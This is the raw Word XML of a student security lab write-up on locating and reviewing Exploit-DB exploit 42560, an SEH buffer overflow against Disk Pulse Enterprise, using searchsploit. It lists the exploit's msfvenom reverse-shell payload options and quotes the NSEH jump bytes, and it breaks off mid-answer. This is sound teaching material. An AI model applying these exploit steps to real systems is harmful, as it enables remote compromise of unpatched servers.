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A1E84" w14:textId="38F12D56" w:rsidR="00654B53" w:rsidRDefault="00654B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 5 – </w:t>
      </w:r>
      <w:r w:rsidR="004A55EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Let’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Crash and Callback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>CIS 450</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>Krutarth Panchal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C689B93" w14:textId="77777777" w:rsidR="00654B53" w:rsidRDefault="00654B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EECCC65" w14:textId="17BB8B1C" w:rsidR="00654B53" w:rsidRDefault="00654B53" w:rsidP="00654B53">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00654B53">
        <w:t>Section 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Exploiting Research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF05C42" w14:textId="3BE2ABD1" w:rsidR="00AD4DF9" w:rsidRPr="00654B53" w:rsidRDefault="00654B53" w:rsidP="00AD4DF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B53">
        <w:t>What website holds an exploit repository that is accessible via both the internet and through the Kali Operating System?</w:t>
      </w:r>
      <w:r w:rsidR="004A6445">
        <w:br/>
      </w:r>
      <w:r w:rsidR="004A6445">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50FE42F0" wp14:editId="237FD835">
            <wp:extent cx="5925257" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="589629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97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3010" cy="30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DF9">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00AD4DF9" w:rsidRPr="00666E96">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://exploit-db.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AD4DF9">
        <w:t xml:space="preserve"> website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31646E37" w14:textId="1B48348C" w:rsidR="00654B53" w:rsidRPr="00654B53" w:rsidRDefault="00654B53" w:rsidP="00654B53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B53">
        <w:t>What is the exploit-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00654B53">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00654B53">
        <w:t xml:space="preserve"> exploit number for Disk Pulse Enterprise 9.9.16 – Buffer Overflow (SEH)</w:t>
      </w:r>
      <w:r w:rsidR="004A6445">
        <w:br/>
      </w:r>
      <w:r w:rsidR="004A6445">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D9BD916" wp14:editId="01A11250">
            <wp:extent cx="5619750" cy="2737827"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="6649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333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993" cy="27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DF9">
        <w:br/>
        <w:t xml:space="preserve">The exploit number is: </w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>42560</w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AB40C0" w14:textId="491D9979" w:rsidR="00654B53" w:rsidRDefault="00654B53" w:rsidP="00654B53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B53">
        <w:t>What command can be run to interface with the exploit-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00654B53">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00654B53">
        <w:t xml:space="preserve"> repository on the </w:t>
      </w:r>
      <w:r w:rsidR="003D1E5B">
        <w:t>GHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00654B53">
        <w:t xml:space="preserve"> Operating System?</w:t>
      </w:r>
      <w:r w:rsidR="003D1E5B">
        <w:br/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D1E5B" w:rsidRPr="003D1E5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D1E5B" w:rsidRPr="003D1E5B">
        <w:t xml:space="preserve"> is the command to search for exploits from exploit-db.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F550910" w14:textId="77777777" w:rsidR="003D1E5B" w:rsidRPr="00654B53" w:rsidRDefault="003D1E5B" w:rsidP="003D1E5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="252"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F330361" w14:textId="76642DE0" w:rsidR="00654B53" w:rsidRPr="00654B53" w:rsidRDefault="00654B53" w:rsidP="00654B53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B53">
        <w:t xml:space="preserve">What command could you run to update </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00654B53">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00654B53">
        <w:t xml:space="preserve"> on the </w:t>
      </w:r>
      <w:r w:rsidR="003D1E5B">
        <w:t>GHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00654B53">
        <w:t xml:space="preserve"> Operating System?</w:t>
      </w:r>
      <w:r w:rsidR="003D1E5B" w:rsidRPr="003D1E5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003D1E5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03BB81DD" wp14:editId="79EB627A">
            <wp:extent cx="5943600" cy="2562860"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="73627933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79330" name="Picture 1" descr="A computer screen shot of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DF9">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="003D1E5B">
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="003D1E5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="003D1E5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -u</w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:t>is used to update repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04185045" w14:textId="188E4FD0" w:rsidR="00654B53" w:rsidRPr="00654B53" w:rsidRDefault="00654B53" w:rsidP="00654B53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B53">
        <w:lastRenderedPageBreak/>
        <w:t>What command could you run to find the Disk Pulse Enterprise 9.9.16?</w:t>
      </w:r>
      <w:r w:rsidR="003D1E5B">
        <w:br/>
      </w:r>
      <w:r w:rsidR="003D1E5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB11E26" wp14:editId="02AB082B">
            <wp:extent cx="5943600" cy="3185160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10341851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8515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DF9">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:br/>
        <w:t xml:space="preserve">As shown in screenshot, command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> disk pulse enterprise</w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>42560</w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">  will</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> find the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24235EE1" w14:textId="0102D9EC" w:rsidR="00654B53" w:rsidRDefault="00654B53" w:rsidP="00654B53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B53">
        <w:t>What command could you use to copy the Disk Pulse Python script to your current directory?</w:t>
      </w:r>
      <w:r w:rsidR="0013741F">
        <w:br/>
      </w:r>
      <w:r w:rsidR="0013741F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04B8E186" wp14:editId="7AD31404">
            <wp:extent cx="5943600" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="27228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81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DF9">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:br/>
        <w:t xml:space="preserve">As per above figure, command: </w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cp/opt/exploit-database/exploits/windows/remote/42560.py</w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:t xml:space="preserve"> copy </w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>42560.py</w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:t xml:space="preserve"> file from </w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD4DF9" w:rsidRPr="00AD4DF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD4DF9">
        <w:t xml:space="preserve"> repository to user’s working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B73965A" w14:textId="77777777" w:rsidR="00654B53" w:rsidRDefault="00654B53" w:rsidP="00654B53"/>
    <w:p w14:paraId="59E65C06" w14:textId="2DD43360" w:rsidR="00654B53" w:rsidRDefault="00654B53" w:rsidP="00654B53">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00654B53">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>– Review Disk Pulse Enterprise Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D0A06" w14:textId="3B16F9FC" w:rsidR="004A6445" w:rsidRDefault="00654B53" w:rsidP="00654B53">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="007A2C2B" w:rsidRPr="0013741F">
        <w:t>What is the first line of 42560.py?</w:t>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287C317B" wp14:editId="616894E1">
            <wp:extent cx="5721500" cy="1504950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1887132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324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895" cy="15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59D">
        <w:br/>
        <w:t xml:space="preserve">First line is:  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AE259D" w:rsidRPr="00AE259D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AE259D" w:rsidRPr="00AE259D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>usr/bin/env/python</w:t>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:br/>
        <w:t>It tells the interpreter to use python to interpret the script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2800FDCD" w14:textId="5197CA02" w:rsidR="007A2C2B" w:rsidRPr="001132AB" w:rsidRDefault="007A2C2B" w:rsidP="00654B53">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2C2B">
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> What imports are used on line 11 in 42560.py?</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    a.</w:t>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE259D" w:rsidRPr="001132AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43555A2A" w14:textId="76D7D874" w:rsidR="004A6445" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">    b. </w:t>
      </w:r>
      <w:r w:rsidR="00AE259D" w:rsidRPr="001132AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B2132" w14:textId="15FC2435" w:rsidR="007A2C2B" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r w:rsidRPr="007A2C2B">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2C2B">
        <w:t>What are the variables for the following in 42560.py?</w:t>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65B81D2B" wp14:editId="6343F3DA">
            <wp:extent cx="3438525" cy="771525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1727487240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87240" name="Picture 1" descr="A close up of a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    a.</w:t>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:t xml:space="preserve"> Target: </w:t>
      </w:r>
      <w:r w:rsidR="00AE259D" w:rsidRPr="001132AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F15BF41" w14:textId="6C8AB2D9" w:rsidR="004A6445" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">    b.</w:t>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:t xml:space="preserve"> Port: </w:t>
      </w:r>
      <w:r w:rsidR="00AE259D" w:rsidRPr="001132AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208C714" w14:textId="6A025839" w:rsidR="007A2C2B" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2C2B">
        <w:t xml:space="preserve">What are the options for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A2C2B">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A2C2B">
        <w:t xml:space="preserve"> command in 42560.py?</w:t>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AD4DF9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76FF76EB" wp14:editId="4BB0D532">
            <wp:extent cx="6686550" cy="361950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15875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0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    a.</w:t>
      </w:r>
      <w:r w:rsidR="0013741F">
        <w:t xml:space="preserve"> -p:</w:t>
      </w:r>
      <w:r w:rsidR="0079343F">
        <w:t xml:space="preserve"> Payload for attacking victim’s machine. </w:t>
      </w:r>
      <w:r w:rsidR="0079343F" w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0079343F" w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="370BF45C" w14:textId="04DD775D" w:rsidR="007A2C2B" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">    b.</w:t>
      </w:r>
      <w:r w:rsidR="0013741F">
        <w:t xml:space="preserve"> LHOST:</w:t>
      </w:r>
      <w:r w:rsidR="0079343F">
        <w:t xml:space="preserve"> Local host, IP address of attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7C96C7" w14:textId="3556E0FD" w:rsidR="007A2C2B" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">    c.</w:t>
      </w:r>
      <w:r w:rsidR="0013741F">
        <w:t xml:space="preserve"> LPORT:</w:t>
      </w:r>
      <w:r w:rsidR="0079343F">
        <w:t xml:space="preserve"> Local Listening port to which exploit will be sent to victim’s machine. 4443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF597BB" w14:textId="6A71C3C7" w:rsidR="007A2C2B" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">    d.</w:t>
      </w:r>
      <w:r w:rsidR="0013741F">
        <w:t xml:space="preserve"> EXITFUNC:</w:t>
      </w:r>
      <w:r w:rsidR="0079343F">
        <w:t xml:space="preserve"> Function to execute after delivery of payload. None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46256EB5" w14:textId="72E19088" w:rsidR="007A2C2B" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">    e.</w:t>
      </w:r>
      <w:r w:rsidR="0013741F">
        <w:t xml:space="preserve"> -e:</w:t>
      </w:r>
      <w:r w:rsidR="0079343F">
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0079343F">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0079343F">
        <w:t xml:space="preserve"> tool, </w:t>
      </w:r>
      <w:r w:rsidR="0079343F" w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0079343F" w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>apha_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0079343F" w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mixed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4EF3FEA8" w14:textId="02ACA7F6" w:rsidR="004A6445" w:rsidRPr="0079343F" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    f. </w:t>
      </w:r>
      <w:r w:rsidR="0013741F">
        <w:t xml:space="preserve"> -f:</w:t>
      </w:r>
      <w:r w:rsidR="0079343F">
        <w:t xml:space="preserve"> Output of exploit, </w:t>
      </w:r>
      <w:r w:rsidR="0079343F" w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B3973" w14:textId="17AD6910" w:rsidR="004A6445" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2C2B">
        <w:t>What variable is used for the shellcode in 42560.py?</w:t>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:br/>
        <w:t xml:space="preserve">    a. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE259D" w:rsidRPr="00AE259D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE259D" w:rsidRPr="00AE259D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> = “”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6551BD76" w14:textId="3DF22515" w:rsidR="004A6445" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2C2B">
        <w:t>What variable is used to put together the buffer as well as the offsets?</w:t>
      </w:r>
      <w:r w:rsidR="00AE259D">
        <w:br/>
        <w:t xml:space="preserve">    a. </w:t>
      </w:r>
      <w:r w:rsidR="00AE259D" w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE259D" w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE259D" w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> # shell</w:t>
      </w:r>
      <w:r w:rsidR="0079343F" w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>code begins from start of the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075CF4CC" w14:textId="3448BB99" w:rsidR="007A2C2B" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2C2B">
        <w:t>What are the answers to the following?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    a.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2C2B">
        <w:t xml:space="preserve">NSEH (JMP SHORT Address): </w:t>
      </w:r>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xEB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>\x10\x90\x90' # NSEH, a short jump of 10 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1427EFE2" w14:textId="4EF10014" w:rsidR="007A2C2B" w:rsidRDefault="007A2C2B" w:rsidP="007A2C2B">
      <w:r>
        <w:t xml:space="preserve">    b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2C2B">
        <w:t xml:space="preserve">SEH (POP EDIT Address): </w:t>
      </w:r>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xDD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0079343F">
        <w:rPr>
          <w:i/>
